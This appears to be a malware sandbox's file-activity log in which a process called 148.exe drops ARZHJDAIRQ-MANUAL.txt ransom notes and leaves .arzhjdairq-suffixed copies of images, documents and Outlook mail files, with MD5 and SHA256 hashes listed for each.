MD5: 3d6e0d45f2a083a3fc9d9cc7186e15c4
SHA256: e927196bacb776ee00ff2f8d8db3f1e64abb94f999988afce5cdc32f2b640124
3332
148.exe
C:\Users\admin\Favorites\Links\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Favorites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\admin\Downloads\phaselearning.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Downloads\postsdictionary.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Downloads\managementeffective.png.arzhjdairq
binary
MD5: e42d772529b53ddaeaeaee0bf2363bcc
SHA256: fdca4b1aad4edf1c8a249918dc15f72768d5f2993a109ab191f9b72a2e8e1720
3332
148.exe
C:\Users\admin\Downloads\islandspresent.jpg.arzhjdairq
binary
MD5: 287b92cad0867b48748ef0b3bfb48e8a
SHA256: e36ced9d825254d1856f33188a38588edcef5f5d5da238c8377156aef0ae9f72
3332
148.exe
C:\Users\admin\Downloads\manufacturingresponsible.png.arzhjdairq
binary
MD5: 2813471e8a4552ff8016386e2714194b
SHA256: 7a85b5bf4742243caf25143797cd199f702d15fe06e75de9d03996add0c5f03d
3332
148.exe
C:\Users\admin\Downloads\manufacturingresponsible.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Downloads\managementeffective.png
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Downloads\islandspresent.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.arzhjdairq
binary
MD5: f4f7263cbc40f7e6aa404674a39f68ae
SHA256: e0ff14e7b48f6951a110545c54e76320dfcff6da63e18f9f15ec9b953418ded6
3332
148.exe
C:\Users\admin\Documents\sevenetc.rtf.arzhjdairq
binary
MD5: d6bf40efe128e38b946e5f61b7016324
SHA256: 0638957b3e6af5e62e4079538cffe30b74337252d1039aa33f973409de67e6de
3332
148.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.arzhjdairq
binary
MD5: 838740ffe3c7ed7ddc1435dc788f6c7d
SHA256: f46a9cc53d34eb973762a77614fa218fd3915f750b6f9838109529f561669f38
3332
148.exe
C:\Users\admin\Downloads\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe